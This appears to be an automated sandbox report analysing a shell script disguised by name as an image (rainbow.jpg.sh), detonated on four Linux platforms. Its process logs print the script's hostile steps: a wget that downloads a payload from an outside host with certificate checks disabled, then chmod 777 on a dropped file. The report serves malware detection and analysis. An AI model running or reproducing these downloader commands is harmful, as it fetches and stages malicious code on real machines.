Analysis Overview
SHA256
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa
Threat Level: Shows suspicious behavior
The file rainbow.jpg.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 06:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 06:12
Reported
2024-11-13 06:14
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tmp.cwW5Sdp2dc | /bin/mktemp | N/A |
| File opened for modification | /tmp/tmp.cwW5Sdp2dc | /usr/bin/wget | N/A |
Processes
/tmp/rainbow.jpg.sh
[/tmp/rainbow.jpg.sh]
/usr/bin/dirname
[dirname -- /tmp/rainbow.jpg.sh]
/bin/mktemp
[mktemp]
/usr/bin/wget
[wget -O /tmp/tmp.cwW5Sdp2dc https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]
/bin/chmod
[chmod 777 /tmp/2.jpg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | cryptor.live | udp |
| US | 1.1.1.1:53 | cryptor.live | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.15:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 06:12
Reported
2024-11-13 06:14
Platform
debian9-armhf-20240729-en
Max time kernel
1s
Max time network
2s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tmp.WZ6zjdRO1H | /bin/mktemp | N/A |
| File opened for modification | /tmp/tmp.WZ6zjdRO1H | /usr/bin/wget | N/A |
Processes
/tmp/rainbow.jpg.sh
[/tmp/rainbow.jpg.sh]
/usr/bin/dirname
[dirname -- /tmp/rainbow.jpg.sh]
/bin/mktemp
[mktemp]
/usr/bin/wget
[wget -O /tmp/tmp.WZ6zjdRO1H https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]
/bin/chmod
[chmod 777 /tmp/2.jpg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | cryptor.live | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-13 06:12
Reported
2024-11-13 06:14
Platform
debian9-mipsbe-20240418-en
Max time kernel
1s
Max time network
2s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tmp.j1h9hwjaTf | /bin/mktemp | N/A |
| File opened for modification | /tmp/tmp.j1h9hwjaTf | /usr/bin/wget | N/A |
Processes
/tmp/rainbow.jpg.sh
[/tmp/rainbow.jpg.sh]
/usr/bin/dirname
[dirname -- /tmp/rainbow.jpg.sh]
/bin/mktemp
[mktemp]
/usr/bin/wget
[wget -O /tmp/tmp.j1h9hwjaTf https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]
/bin/chmod
[chmod 777 /tmp/2.jpg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | cryptor.live | udp |
| US | 172.67.190.23:443 | cryptor.live | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-13 06:12
Reported
2024-11-13 06:14
Platform
debian9-mipsel-20240418-en
Max time kernel
1s
Max time network
3s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tmp.jf2YkswMoM | /bin/mktemp | N/A |
| File opened for modification | /tmp/tmp.jf2YkswMoM | /usr/bin/wget | N/A |
Processes
/tmp/rainbow.jpg.sh
[/tmp/rainbow.jpg.sh]
/usr/bin/dirname
[dirname -- /tmp/rainbow.jpg.sh]
/bin/mktemp
[mktemp]
/usr/bin/wget
[wget -O /tmp/tmp.jf2YkswMoM https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]
/bin/chmod
[chmod 777 /tmp/2.jpg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | cryptor.live | udp |
| US | 104.21.65.117:443 | cryptor.live | tcp |